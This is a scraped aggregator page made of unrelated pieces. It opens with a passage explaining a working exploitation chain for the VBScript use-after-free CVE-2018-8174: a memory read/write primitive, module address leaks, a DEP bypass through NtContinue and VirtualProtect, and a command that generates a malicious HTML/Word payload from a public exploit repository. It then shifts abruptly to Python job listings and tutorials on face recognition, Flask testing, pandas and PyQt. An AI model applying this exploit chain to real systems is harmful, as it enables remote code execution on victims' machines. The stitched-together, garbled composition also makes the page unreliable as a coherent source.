Through the UAF, the exploit creates two class objects whose mem members point at addresses 0x0c bytes apart; by reading and writing through the two objects' mem members, it forges an array of size 0x7fffffff. The forged array is roughly: one-dimensional, 0x7fffffff elements, each element one byte, with element base address 0. The array can therefore access memory from 0x00000000 to 0x7fffffff*1, i.e. arbitrary read/write. The variable lIlIIl is stored as a string type, so its data type merely has to be changed to 0x200C, i.e. VT_VARIANT|VT_ARRAY (an array type), to achieve the goal.

The attack code mainly uses the function above to read the data at the memory address passed in as a parameter. The idea: VBScript strings are BSTRs, and LenB(bstrxx) returns the contents of the 4 bytes stored immediately before the string data (the BSTR size field), which yields a read primitive for a chosen address.

As the code shows, if the incoming parameter is addr (0x11223344), the value is first incremented by 4 to 0x11223348, and its variant type is set to 8 (string). Calling Len then treats the value as a BSTR, so VBScript reads the 4 bytes immediately before it, i.e. at 0x11223344, as the length. Executing Len thus returns the contents of the specified memory address.

Module addresses are obtained via a DOS-mode search. Leaking the virtual function table address of the CScriptEntryPoint object gives an address inside vbscript.dll. Because vbscript.dll imports msvcrt.dll, walking vbscript.dll's import table yields msvcrt.dll's base address; msvcrt.dll in turn pulls in kernelbase.dll and ntdll.dll, from which the addresses of NtContinue and VirtualProtect are finally obtained.

Bypassing DEP to execute the shellcode

a. Using the arbitrary read/write primitive, modify the type of a VAR to 0x4d and then assign 0 to it, so the script VM executes the VAR::Clear function (see figure).
b. Careful control makes the code execute ntdll!ZwContinue, whose first parameter, a CONTEXT structure, is also carefully crafted by the attacker (see figure).
c. ZwContinue's first parameter is a pointer to a CONTEXT structure, from which the offsets of EIP and ESP within the CONTEXT can be computed.
d. The figure shows the runtime values of Eip and Esp in the CONTEXT and the attacker's method. The attacker sets the CONTEXT's EIP to VirtualProtect, and sets both the return address at ESP and VirtualProtect's first parameter to the start address of the shellcode. When ZwContinue executes, control jumps directly to VirtualProtect's first instruction. With the attacker-constructed parameters, the memory holding the shellcode is marked executable, and when VirtualProtect returns, execution jumps to the shellcode. Finally WinExec is called to pop up the calculator.

MSF exploitation

Environment:
Target machine: Windows 7 with a vulnerable version of Office installed
Attack machine: Kali Linux
MSF component: https://github.com/Sch01ar/CVE-2018-8174_EXP

Generate the HTML page and Word document carrying the malicious VBScript:

python CVE-2018-8174.py -u http://192.168.106.139/exploit.html [...]
          Mid-level Python Developer Analyst – 1 Opening – Rio de Janeiro – RJ      Cache   Translate Page      
Openings in: 1 opening – Rio de Janeiro – RJ (1). To see the job details and apply, click here. If you cannot access it, copy and paste this URL into your browser: https://emprego.net/jobs/5bd74cb3108a987e0cc1824b emprego.net – where candidates and... Read more...
          Python Developer - Sport's Betting Company      Cache   Translate Page      
Understanding Recruitment - The City, London - Python Developer - Sport's Betting Company Hammersmith, London - £70,000 - £80,000 We're hiring for a Python Developer for a Sport...'s betting tech company. As the Python Developer you will be working with a diverse team of developers and analysts. The task of the Python...
          Stegano 0.8.6      Cache   Translate Page      
Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information.
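To illustrate the LSB technique the module implements (this toy sketch is not Stegano's actual API), each bit of the hidden message replaces the least significant bit of one carrier byte, so no carrier byte changes by more than 1:

```python
def hide(carrier, message):
    # Replace the LSB of each carrier byte with one bit of the message.
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    if len(bits) > len(carrier):
        raise ValueError('carrier too small')
    out = bytearray(carrier)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)

def reveal(carrier, length):
    # Reassemble `length` bytes from the carrier's least significant bits.
    bits = [b & 1 for b in carrier[:length * 8]]
    return bytes(
        sum(bit << (7 - i) for i, bit in enumerate(bits[k:k + 8]))
        for k in range(0, len(bits), 8)
    )

pixels = bytes(range(200))   # stand-in for raw pixel data
stego = hide(pixels, b'hi')
print(reveal(stego, 2))      # b'hi'
```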
          python or C++ Expert that knows MINIZINC      Cache   Translate Page      
I need a help with a little project. Modeling the following problem and then programming in MiniZinc: More details will be shared via chat (Budget: $10 - $30 CAD, Jobs: C Programming, Data Analytics, Data Entry, Mathematics, Python)
          Senior Python (Django) Developer      Cache   Translate Page      
NY-Manhattan, Harvey Nash, Inc. ($950M+ company - www.harveynash.com) is a global IT Recruitment, Outsourcing, Offshoring company founded in 1988 with more than 40 offices covering the USA (7 offices), Europe, Australia and Singapore. Publicly-traded in London stock exchange - LON: HVN. Our direct client located in New York City is looking to hire a Python (Django) Developer. We invite you to review the positio
          ERP Developer (Senior)      Cache   Translate Page      
Ho Chi Minh City - ERP Developer (Senior), HHD GROUP Joint Stock Company. Updated: 06/11/2018. Recruitment information - Workplace: ... Requirements: proficiency in one of the following programming languages: Python, Java, C#, .NET, ASP.NET, PHP. Database: experience with at least one DBMS...
          imgp - multi-core batch image file resize and rotate      Cache   Translate Page      

imgp is a Python-based command-line tool that lets you resize and rotate JPEG and PNG files.


          Python Developer      Cache   Translate Page      
TX-Austin, Our well established client is seeking an ambitious and experienced Python Developer to join their dedicated team in Austin. This position has a great benefit package that includes Medical, Dental and Vision benefits, 401k with company matching, and life insurance for those who qualify. Responsibilities of the Python Developer: Review SOW use cases, specifications, and requirements to develop a cl
          Python / Django Lead Web Developer - Avenza Systems Inc. - Toronto, ON      Cache   Translate Page      
The app is used daily by tens of thousands of users all over the world, including pilots, forest rangers, firefighters, military personnel, hikers and more, to...
From Avenza Systems Inc. - Tue, 30 Oct 2018 10:39:40 GMT - View all Toronto, ON jobs
          Python Developer - Hitachi ID Systems - Montréal, QC      Cache   Translate Page      
Translate business process definitions into Python components, built using a well defined framework and shipped with our IAM products....
From Hitachi ID Systems - Thu, 01 Nov 2018 10:20:39 GMT - View all Montréal, QC jobs
          Thomas Kölpin, Biologist      Cache   Translate Page      
He comes from Hamburg, first studied psychology and then biology, and became an internationally recognized reptile expert who also keeps pythons privately. For four and a half years, Thomas Kölpin has been director of the Stuttgart Wilhelma, one of the largest zoological gardens in Stuttgart, and faces the major task of shaping its future: improving the animals' living conditions and strengthening species conservation, and all this at a time when the very purpose of zoological institutions is being questioned.
          Adjunct Instructor - Computer Science - Casper College - Casper, WY      Cache   Translate Page      
Teach courses at the freshman and sophomore level, including C++ and Visual Basic, Python, and Java Teaching. The Adjunct Computer Science Instructor teaches a...
From Casper College - Fri, 26 Oct 2018 19:05:54 GMT - View all Casper, WY jobs
          Data Analyst Python SQL Mathematics      Cache   Translate Page      
Data Team - West London - Data Analyst London to £70k Data Analyst / Reporting Engineer (Python SQL). Are you a skilled Data Analyst with Python programming skills... offices in a vibrant area of London? Collaborating with Data Scientists you will design, maintain and manage the evolutio......
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with Java, JavaScript, C#, PHP, Visual Basic, Python, HTML, XML, CSS, and AJAX. Experience with software installation and maintenance, specifically...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Jr. Java Developer - DISH Network - Cheyenne, WY      Cache   Translate Page      
GoLang, Java, Python. A successful Junior Java Developer will:. Have 3+ years of professional enterprise development experience. Sling TV L.L.C....
From DISH - Wed, 19 Sep 2018 16:13:34 GMT - View all Cheyenne, WY jobs
          API Test Automation Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
GoLang, Java, Python, JavaScript, Type Script. Have 3+ years of professional enterprise development / testing experience. Sling TV L.L.C....
From DISH - Fri, 14 Sep 2018 17:19:08 GMT - View all Cheyenne, WY jobs
          Senior Data Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
4 or more years of experience in programming and software development with Python, Perl, Java, and/or other industry standard language....
From DISH - Wed, 15 Aug 2018 05:17:45 GMT - View all Cheyenne, WY jobs
          Software Developer - Matric - Morgantown, WV      Cache   Translate Page      
Application development with Java, Python, Scala. Enterprise level web applications. MATRIC is a strategic innovation partner providing deep, uncommon expertise...
From MATRIC - Tue, 11 Sep 2018 00:02:33 GMT - View all Morgantown, WV jobs
          C++ Developer with Python skills - Experis - Rahway, NJ      Cache   Translate Page      
| Mercury, Segue, Borland. This specialization is usually performed by senior test practitioner with experience in leading large test teams....
From Experis - Tue, 23 Oct 2018 17:42:46 GMT - View all Rahway, NJ jobs
          Remote Starters Installation Tech - Directed - Montréal, QC      Cache   Translate Page      
Offer Red line support for Directed Tech Support teams in Vista (U.S.). DIRECTED is a world leader in vehicle security (Viper®, Clifford®, Python® and...
From Directed - Tue, 30 Oct 2018 17:33:25 GMT - View all Montréal, QC jobs
          Remote Starter Installation Technician - Directed - Montréal, QC      Cache   Translate Page      
Offer Red line support for Directed Tech Support teams in Vista (U.S.). Directed is a world leader in vehicle security (Viper®, Clifford®, Python® and Autostart...
From Indeed - Tue, 30 Oct 2018 15:45:50 GMT - View all Montréal, QC jobs
          #3: Python for Everybody: Exploring Data in Python 3      Cache   Translate Page      
Python for Everybody
Python for Everybody: Exploring Data in Python 3
Charles Severance , Aimee Andrion , Elliott Hauser , Sue Blumenberg
(7)

Buy new: CDN$ 1.29

(Visit the Bestsellers in Languages & Tools list for authoritative information on this product's current rank.)
          #7: Python Pocket Reference: Python In Your Pocket      Cache   Translate Page      
Python Pocket Reference
Python Pocket Reference: Python In Your Pocket
Mark Lutz
(8)

Buy new: CDN$ 19.39 CDN$ 19.31
43 used & new from CDN$ 11.34

(Visit the Bestsellers in Languages & Tools list for authoritative information on this product's current rank.)
          #9: Python for Kids: A Playful Introduction To Programming      Cache   Translate Page      
Python for Kids
Python for Kids: A Playful Introduction To Programming
Jason R. Briggs
(5)

Buy new: CDN$ 36.95 CDN$ 36.58
46 used & new from CDN$ 8.82

(Visit the Bestsellers in Languages & Tools list for authoritative information on this product's current rank.)
           Comment on “Sarkar”… An efficient political platform that should have been a more effective movie by Monty Python       Cache   Translate Page      
Long live Thalapathy Vijay, future Google CEO! Let me be the first to propose Thalapathy for this and would urge the board of directors to consider appointing Vijay for this position. Considering political ambitions of Vijay (et al., of course), and the art of trivialization which these people have mastered along with the art of acting, I do not think this to be a long shot. In fact, Google manages far fewer employees than TN government. And Google CEO is expected to enjoy with babes in Las Vegas, deliver punch dialogues, etc. "Farce" would be an understatement for movies like this and the support it gets from the so called fans.
          Do annotation for my dataset      Cache   Translate Page      
I would like to hire a freelancer to do annotations to my image dataset (total number of images is less than 100) using VIA 1.0 (Budget: ₹600 - ₹1500 INR, Jobs: Algorithm, Artificial Intelligence, C Programming, Machine Learning, Python)
          Implementing simple face recognition in Python: turns out I look just like this celebrity      Cache   Translate Page      

In recent years, a wave of enthusiasm for artificial intelligence has shown people how capable and powerful AI can be: image recognition, speech recognition, machine translation, self-driving cars, and so on. Overall, though, the bar to entry is still fairly high. You not only have to learn to implement things with the frameworks; more importantly, you need some mathematical grounding, such as linear algebra, matrices, and calculus.

Fortunately, many experts at home and abroad have already built the "wheels" for us, and we can use certain models directly. Today let's walk through how to implement a simple face comparison. It's great fun!

Overall approach:

- Load the required face recognition models up front
- Loop over the images in a folder so the model "remembers" what each person looks like
- Feed in a new image, compare it with the images in the folder from the previous step, and return the closest result

Third-party modules and models used:

Modules: os, dlib, glob, numpy

Models: a facial landmark detector and a face recognition model

1. Import the required modules and models

[The code for this step is shown as an image in the original article.]

A word about the two .dat files:

They are essentially parameter values (that is, neural network weights). Face recognition is an application of deep learning, and a model first has to be trained on a large number of face images, so someone had to design a neural network structure that can "remember" human faces.

For a neural network, even with the same structure, different parameters make it recognize different things. Here, the two parameter files serve different functions (and the network structures they correspond to also differ):

shape_predictor.dat detects facial landmarks, such as the eyes and mouth; dlib_face_recognition.dat generates face feature values on top of the detected landmarks.

So when we use the dlib module later, we are effectively invoking a certain neural network structure and passing it pre-trained parameters. Incidentally, in deep learning it is quite normal to end up with parameter models hundreds of megabytes in size.

2. Recognize the training set

In this step, for each person's image in the image folder, we compute the face descriptor and put it into a list, so that later we can compute distances against a new image. The key parts are commented and should not be hard to follow. [The implementation is shown as an image in the original article.]

After finishing this step, print the list descriptors and you will see arrays like the ones described; each array is the feature vector (128 dimensions) of one image. We can then use the L2 norm (Euclidean distance) to compute the distance between two of them.

For example, suppose that after computation A's feature vector is [x1,x2,x3], B's feature vector is [y1,y2,y3], and C's feature vector is [z1,z2,z3].

If the computed distance between A and B is smaller, A and B are considered more alike. Imagine the extreme case: shouldn't two different photos of the same person have nearly identical feature vectors? Once you see this, you can keep going.

3. Process the image to compare

It is really the same idea again: the goal is to compute a feature vector, so this step is much like step 2. Then compute the distance between the new image and each image from step 2, combine the results into a dict, sort it, and take the minimum. Done! [The implementation is shown as an image in the original article.]

4. Run it

Here I used a photo of Lin Guobin ("Senior Brother Duan Shui Liu"), and the recognition result was, sure enough, closest to Leon Lai (hehe, I love Leon Lai). But if you had put a photo of Lin Guobin in the training image set beforehand, the result would have been Lin Guobin.

Why Leon Lai? Let's print the distance between the person in the input image and each celebrity: [the distances are shown as an image in the original article.]

That's right: his distance to Leon Lai is the smallest, so he looks the most like him!
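The article's code appears only as screenshots, but the matching logic of steps 2 and 3 (compute the Euclidean distance to every known descriptor and take the smallest) can be sketched in plain Python; the short vectors below are made-up stand-ins for dlib's 128-dimensional face descriptors:

```python
import math

# Hypothetical 3-d descriptors standing in for dlib's 128-d face vectors.
known_faces = {
    'Leon Lai':     [0.1, 0.2, 0.3],
    'Andy Lau':     [0.9, 0.1, 0.4],
    'Jacky Cheung': [0.5, 0.5, 0.5],
}

def euclidean(a, b):
    # L2 norm of the difference between two feature vectors.
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

def closest_match(descriptor, candidates):
    # Compute the distance to every known face and keep the smallest.
    distances = {name: euclidean(descriptor, vec)
                 for name, vec in candidates.items()}
    return min(distances.items(), key=lambda kv: kv[1])

new_face = [0.15, 0.25, 0.35]
name, dist = closest_match(new_face, known_faces)
print(name, round(dist, 4))  # Leon Lai 0.0866
```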


          [ANNOUNCE] StGit 0.19      Cache   Translate Page      
I am pleased to announce the release of Stacked Git 0.19.

The big feature for this release is Python 3 support, but 0.19 also
contains some important bug fixes and more robust test infrastructure.

The full release notes follow.

Cheers,
Pete

----%<----

Stacked Git 0.19 released
-------------------------

StGit is a Python application providing functionality similar to Quilt
(i.e. pushing/popping patches to/from a stack) on top of Git. These
operations are performed using Git commands, and the patches are stored
as Git commit objects, allowing easy merging of the StGit patches into
other repositories using standard Git functionality.

Download: https://github.com/ctmarinas/stgit/archive/v0.19.tar.gz
Main repository: https://github.com/ctmarinas/stgit
Project homepage: http://www.procode.org/stgit/
Issue tracker: https://github.com/ctmarinas/stgit/issues

The main changes since release 0.18:

- Python 3 support. StGit supports Python 2.6, 2.7, 3.3, 3.4, 3.5, 3.6,
and 3.7. PyPy interpreters are also supported.

- Submodules are now ignored when checking if working tree is clean.
Submodules are also not included by default when refreshing a patch.

- Config booleans are now parsed similarly to git-config.

- contrib/stgit.el is now licenced with GPLv2.

- Repair handling of emails with utf-8 bodies containing latin-1
characters. Also correctly decode email headers containing quoted
encoded words.

- StGit's version is now correct/available in the release archive.

- Add continuous integration (travis-ci) and code coverage (coveralls)
support.

- Many new test cases were added.

          Testing a Flask application with pytest      Cache   Translate Page      

Python itself ships with the unittest framework, but I don't find it very pleasant to use; I much prefer pytest.

The example below shows how to unit-test a Flask application with pytest.

First, create a Flask application with one route for the root path. The code is as follows:

# server.py
import flask

app = flask.Flask(__name__)

@app.route('/')
def home():
    return 'ok'

Then write a unit test for the home page:

# tests/test_app.py
def test_home_page(client):
    rv = client.get('/')
    assert rv.status_code == 200
    assert rv.data == b'ok'

Then run the test case with: pytest -s tests/test_app.py

Writing a test case in pytest only requires defining a function whose name starts with test_.

That is the most basic test of a Flask route. Next, write a new route whose page can only be visited after the user logs in. The code is as follows:

# server.py
@app.route('/member')
@flask_security.decorators.login_required
def member():
    user = flask_security.core.current_user
    return str(user.id)

To test this route, we first need to create a user.

# tests/test_app.py
def setup_module(module):
    App.testing = True
    fixture.setup()

def teardown_module(module):
    """ """

The setup_module and teardown_module functions above run before and after all the test cases in the module, respectively. Here we use setup_module to create a user before the tests run. Then create a pytest fixture:

# tests/conftest.py
@pytest.fixture
def auth_client(client):
    with client.session_transaction() as sess:
        sess['user_id'] = str(fixture.users[0].id)
    yield client

This creates an auth_client fixture; every request made through auth_client afterwards is in a logged-in state.

Finally, write two test cases for the /member route, one without login and one with:

def test_member_page_without_login(client):
    """Without login, redirect to the login page."""
    rv = client.get('/member')
    assert rv.headers['Location'] == 'http://localhost/login?next=%2Fmember'
    assert rv.status_code == 302

def test_member_page_with_login(auth_client):
    """When logged in, return the current user's id."""
    rv = auth_client.get('/member')
    assert rv.status_code == 200
    assert rv.data.decode('utf8') == str(fixture.users[0].id)

That is already a simple Flask application. But sometimes a slightly more complex application calls third-party APIs, and to write tests for those cases we need mocking. Write one more route:

# server.py
@app.route('/movies')
def movies():
    data = utils.fetch_movies()
    if not data:
        return '', 500
    return flask.jsonify(data)

# utils.py
def fetch_movies():
    try:
        url = 'http://api.douban.com/v2/movie/top250?start=0&count=1'
        res = requests.get(url, timeout=5)
        return res.json()
    except Exception as e:
        return {}

Requesting this route returns Douban's top-250 movie information. Then write two test cases, simulating a successful and a failed API call respectively.

# tests/test_app.py
def test_movies_api(client):
    """The Douban API call succeeds."""
    fetch_movies_patch = mock.patch('utils.fetch_movies')
    func = fetch_movies_patch.start()
    func.return_value = {'start': 0, 'count': 0, 'subjects': []}
    rv = client.get('/movies')
    assert rv.status_code == 200
    assert func.called
    fetch_movies_patch.stop()

def test_movies_api_with_error(client):
    """The Douban API call fails."""
    fetch_movies_patch = mock.patch('utils.fetch_movies')
    func = fetch_movies_patch.start()
    func.return_value = None
    rv = client.get('/movies')
    assert rv.status_code == 500
    assert func.called
    fetch_movies_patch.stop()

Here Python's mock module is used to make a function return a fixed result.
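The same start()/stop() patching pattern works outside Flask too. This self-contained sketch (the utils stand-in below is hypothetical, not the article's module) shows mock.patch.object returning a fixed value during a test and restoring the original afterwards:

```python
from unittest import mock
import types

# A stand-in "module" with a function we want to replace during a test.
utils = types.SimpleNamespace(fetch_movies=lambda: {'subjects': ['real data']})

def movies_view():
    data = utils.fetch_movies()
    return (data, 200) if data else ('', 500)

# Patch the function to return a fixed value, as in the tests above.
patcher = mock.patch.object(utils, 'fetch_movies')
func = patcher.start()
func.return_value = {}            # simulate the API failing
assert movies_view() == ('', 500)
assert func.called
patcher.stop()

# After stop(), the real function is back.
assert movies_view() == ({'subjects': ['real data']}, 200)
```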

The full code is available at: https://github.com/wusuopu/flask-test-example


          Open source tools | Getting started with data science in Python      Cache   Translate Page      

开源工具 | Python数据科学入门

不需要昂贵的工具即可领略数据科学的力量,从这些开源工具起步即可。

无论你是一个具有数学或计算机科学背景的资深数据科学爱好者,还是一个其它领域的专家,数据科学提供的可能性都在你力所能及的范围内,而且你不需要昂贵的,高度专业化的企业级软件。本文中讨论的开源工具就是你入门时所需的全部内容。

python ,其机器学习和数据科学库( pandas 、 Keras 、 TensorFlow 、 scikit-learn 、 SciPy 、 NumPy 等),以及大量可视化库( Matplotlib 、 pyplot 、 Plotly 等)对于初学者和专家来说都是优秀的自由及开源软件工具。它们易于学习,很受欢迎且受到社区支持,并拥有为数据科学而开发的最新技术和算法。它们是你在开始学习时可以获得的最佳工具集之一。

许多 Python 库都是建立在彼此之上的(称为依赖项),其基础是 NumPy 库。NumPy 专门为数据科学设计,经常被用于在其 ndarray 数据类型中存储数据集的相关部分。ndarray 是一种方便的数据类型,用于将关系表中的记录存储为 cvs 文件或其它任何格式,反之亦然。将 scikit 函数应用于多维数组时,它特别方便。SQL 非常适合查询数据库,但是对于执行复杂和资源密集型的数据科学操作,在 ndarray 中存储数据可以提高效率和速度(但请确保在处理大量数据集时有足够的 RAM)。当你使用 pandas 进行知识提取和分析时,pandas 中的 DataFrame 数据类型和 NumPy 中的 ndarray 之间的无缝转换分别为提取和计算密集型操作创建了一个强大的组合。

作为快速演示,让我们启动 Python shell 并在 pandas DataFrame 变量中加载来自巴尔的摩的犯罪统计数据的开放数据集,并查看加载的一部分 DataFrame:

>>> import pandas as pd >>> crime_stats =pd.read_csv('BPD_Arrests.csv') >>> crime_stats.head()
开源工具 | Python数据科学入门

我们现在可以在这个 pandas DataFrame 上执行大多数查询,就像我们可以在数据库中使用 SQL 一样。例如,要获取 Description 属性的所有唯一值,SQL 查询是:

$ SELECT unique(“Description”) from crime_stats;

利用 pandas DataFrame 编写相同的查询如下所示:

>>> crime_stats['Description'].unique() ['COMMON ASSAULT' 'LARCENY' 'ROBBERY - STREET' 'AGG. ASSAULT' 'LARCENY FROM AUTO' 'HOMICIDE' 'BURGLARY' 'AUTO THEFT' 'ROBBERY - RESIDENCE' 'ROBBERY - COMMERCIAL' 'ROBBERY - CARJACKING' 'ASSAULT BY THREAT' 'SHOOTING' 'RAPE' 'ARSON']

它返回的是一个 NumPy 数组(ndarray 类型):

>>>type(crime_stats['Description'].unique()) <class 'numpy.ndarray'>

接下来让我们将这些数据输入神经网络,看看它能多准确地预测使用的武器类型,给出的数据包括犯罪事件,犯罪类型以及发生的地点:

>>> from sklearn.neural_network import MLPClassifier >>> import numpy as np >>> >>> prediction = crime_stats[[‘Weapon’]] >>> predictors = crime_stats['CrimeTime', ‘CrimeCode’, ‘Neighborhood’] >>> >>> nn_model = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1) >>> >>>predict_weapon = nn_model.fit(prediction, predictors)

Now that the learning model is ready, we can perform some tests to determine its quality and reliability. For starters, let's feed in some data (a portion of the original dataset that was held out and not used to build the model):

>>> predict_weapon.predict(training_set_weapons)
array([4, 4, 4, ..., 0, 4, 4])

As you can see, it returns a list, with each number predicting the weapon for each record in the set. We see numbers rather than weapon names because most classification algorithms are optimized for numerical data. For categorical data, there are techniques that convert attributes into numeric representations. In this case, the technique used is label encoding, via the LabelEncoder function in the sklearn preprocessing library: preprocessing.LabelEncoder(). It can transform data to its numeric representation and back. In this example, we can use LabelEncoder()'s inverse_transform function to see what weapons 0 and 4 are:

>>> preprocessing.LabelEncoder().inverse_transform(encoded_weapons)
array(['HANDS', 'FIREARM', 'HANDS', ..., 'FIREARM', 'FIREARM', 'FIREARM'])
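The idea behind label encoding can be sketched without scikit-learn at all: assign each category an integer code and keep the inverse mapping around. This is a toy illustration of the concept, not the actual LabelEncoder internals:

```python
weapons = ["HANDS", "FIREARM", "HANDS", "KNIFE"]

classes = sorted(set(weapons))                   # ['FIREARM', 'HANDS', 'KNIFE']
to_code = {label: i for i, label in enumerate(classes)}

encoded = [to_code[w] for w in weapons]          # the "transform" direction
decoded = [classes[c] for c in encoded]          # the "inverse_transform" direction

print(encoded)             # [1, 0, 1, 2]
print(decoded == weapons)  # True
```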

This is fun, but to get a sense of how accurate the model is, let's calculate a few scores as percentages:

>>> nn_model.score(X, y)
0.81999999999999995

This shows our neural network model is about 82% accurate. That result may seem impressive, but it is important to check its effectiveness on a different crime dataset. There are other tests for this, such as correlation and confusion matrices. Although our model has high accuracy, it is not very useful for general crime datasets, because this particular dataset has a disproportionate number of rows listing FIREARM as the weapon used. Unless it is retrained, our classifier is most likely to predict FIREARM, even if the input dataset has a different distribution.

It is important to clean the data and remove outliers and malformed records before classifying it. The better the preprocessing, the more accurate our insights will be. Also, feeding a model or classifier too much of the data (typically over 90%) in pursuit of higher accuracy is a bad idea: it looks accurate but is ineffective due to overfitting.
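One simple way to hold out an evaluation set is to shuffle the records and slice off a fraction. This is a toy sketch on fake data; for real datasets, scikit-learn's train_test_split does the same job with stratification options:

```python
import random

data = list(range(100))      # stand-in for 100 dataset records
random.seed(0)               # fixed seed so the split is reproducible
random.shuffle(data)

split = int(len(data) * 0.8)             # 80/20 train/test split
train, test = data[:split], data[split:]
print(len(train), len(test))  # 80 20
```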

Jupyter notebooks are a great interactive alternative to the command line. While the CLI is fine for most things, Jupyter shines when you want to run snippets of code to generate visualizations. It also formats data better than the terminal.

This article lists some of the best free machine-learning resources, but plenty of other guides and tutorials are available. You will also find many open datasets to work with, depending on your interests and inclinations. As a starting point, the datasets maintained by Kaggle, as well as those available on state government websites, are excellent resources.

[Editor: Pang Guiyu TEL: (010) 68476606]


          Transfer files from laptop to mobile using Python      Cache   Translate Page      

If you think that you need some fancy application to transfer files from your laptop/computer to your mobile, then you are wrong.

All you need is Python.

NOTE: Your laptop and your mobile phone should be on the same network.

Let's get started

Open your terminal and execute this command.

If you are using Python3 :

python -m http.server

If you are using Python2 :

python -m SimpleHTTPServer

When you execute this command, it will create an HTTP server on your local machine.



Type <IP_Address>:8000 in your mobile browser to access the files in the directory where you ran the above command.

If you don't know your IP, then follow these steps:

Go to System Preferences -> Network-> You will see your IP address there

Suppose your IP address is 192.168.0.1 then open mobile browser and type 192.168.0.1:8000 to access the files.
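If you would rather stay in Python, you can also ask the standard library for a local address. This is a best-effort sketch; on some machines it falls back to 127.0.0.1, in which case use the System Preferences route above:

```python
import socket

def get_local_ip():
    """Best-effort lookup of this machine's LAN address."""
    try:
        # Connecting a UDP socket sends no packets; it just makes
        # the OS pick the outgoing interface (and address) for us.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except OSError:
        try:
            return socket.gethostbyname(socket.gethostname())
        except OSError:
            return "127.0.0.1"

print(get_local_ip())  # e.g. 192.168.0.1
```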



If you like this post, then also check out my blog: SourceAI


          Python Tip: How to Export a Jupyter Notebook to PDF?      Cache   Translate Page      

Background: After building an interactive data analysis or model in a Jupyter notebook, you may want to export a PDF as a simple report or as material to share. How do you export a PDF from a Jupyter notebook, with no garbled characters in the title or body when the notebook contains Chinese?

Solution

Taking the Windows operating system as an example, the steps are as follows: 1. Install MiKTeX. Download link: https://miktex.org/download. After the download succeeds, install it with the default settings.

2. Modify the configuration files. 2.1 Anaconda3\Lib\site-packages\nbconvert\templates\latex\article.tplx

Change \documentclass[11pt]{article} to \documentclass[11pt]{ctexart}

2.2 Anaconda3\Lib\site-packages\nbconvert\templates\latex\base.tplx

Comment out %\usepackage[T1]{fontenc}. Then change ((* block title *))\title{((( resources.metadata.name | ascii_only | escape_latex )))} ((* endblock title *))

to:

((* block title *))\title{((( resources.metadata.name | escape_latex )))} ((* endblock title *))

3. Restart your computer, then launch Jupyter notebook again; you should now be able to export notebook files as PDFs.

References:

1 https://github.com/jupyter/notebook/issues/2848 2 https://ask.hellobi.com/blog/zhaolin/10697

If you have any questions, please leave a comment.



          One in a Million: Teaching Coding With Python      Cache   Translate Page      

I’ve been teaching programming for more than 17 years. During this period, I’ve developed a nice inventory of exercises and code examples, some of which are as old as my teaching career. And even though I’ve taught, and continue to teach, a variety of languages, most examples work just as well in any language.

Here is one of them; I use it in the first lesson on conditionals. The program generates a random number in the range [0, 100] and then asks the user to guess it. The user gets one chance, since it’s a very early lesson and the students don’t know loops yet. The program outputs “Correct” or “Wrong” and that’s it. Look at it (this time in Python, because that’s the language I teach now):

import random
compNum = int(random.random() * 101)
userGuess = int(input("Enter your guess:"))
if compNum == userGuess:
    print("Correct")
else:
    print("Wrong")

Yeah, it’s simple, yet it’s a pretty powerful example. When I show it, I type it live during class and then ask the students to try to guess. I know it sounds silly and futile, but believe me, it’s such fun!

No one ever manages to guess correctly.

Today, I showed this example again and, as usual, invited the students to try their luck. One of them yelled from her seat, “31.”

“Very well,” I said, “31 for the lady.” And typed in 31.

I pressed enter.

And boom.

I saw “Correct” on the screen.

It was so surprising that I couldn’t talk for a second, because it was the first time in 17 years that it had happened.

I think now I know the meaning of the phrase “One in a million”!

P.S. Yeah, I know there are better ways to generate random numbers; I deliberately use this one because it shows a really important principle in software engineering.
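For reference, the more direct standard-library route the P.S. alludes to is random.randint, which covers the same range and is inclusive on both ends:

```python
import random

# Equivalent range to int(random.random() * 101): 0 through 100 inclusive
comp_num = random.randint(0, 100)
print(0 <= comp_num <= 100)  # True
```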


          A study aid using Python and PyQt      Cache   Translate Page      

About a year ago, I took a course in Arabic. In addition to being a right-to-left written language, Arabic has its own alphabet. Since this was an introductory class, I spent most of my time working my way through the Arabic alphabet.

So I decided to create a study aid: it would present an Arabic letter, I would formulate a guess, and it would tell me whether or not I had answered correctly. Some brief experimentation, however, showed that this approach would not work: the letters appeared so small that I couldn’t be sure what I was seeing on the command line.

My next idea was to come up with some sort of window display of the glyph that was large enough to easily recognize. Since PyQt

Upon delving in, I discovered a number of resources on the web, and as I began to experiment, I needed to make sure all the code correlated. In particular, there have been changes in the organization of PyQt as it has gone from PyQt 4 to PyQt 5, and the latter requires Python 3.

After getting this all straightened out, here is what I came up with:

#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
arabic.py

An exercise for learning Arabic letters. An Arabic letter is shown, the name of which can be guessed.
Hover the mouse cursor over the letter to see its name in a Tool Tip. Click Next to load another
letter.
"""

import sys
from random import randint
from PyQt5.QtCore import *
from PyQt5.QtGui import QFont
from PyQt5.QtWidgets import QWidget, QLabel, QApplication, QToolTip, QPushButton

class Example(QWidget):

    def __init__(self, parent=None):
        super(Example, self).__init__(parent)
        self.initUI()

    def initUI(self):
        QToolTip.setFont(QFont('DejaVuSans', 30))
        i = randint(0, 37)
        self.lbl2 = QLabel(L[12], self)
        self.lbl2.setToolTip(lname[12] + '\n')
        self.lbl2.setFont(QFont('FreeSerif', 40))
        self.lbl2.setTextFormat(1)
        self.lbl2.setAlignment(Qt.AlignVCenter)
        self.lbl2.setAlignment(Qt.AlignHCenter)
        butn = QPushButton("Next", self)
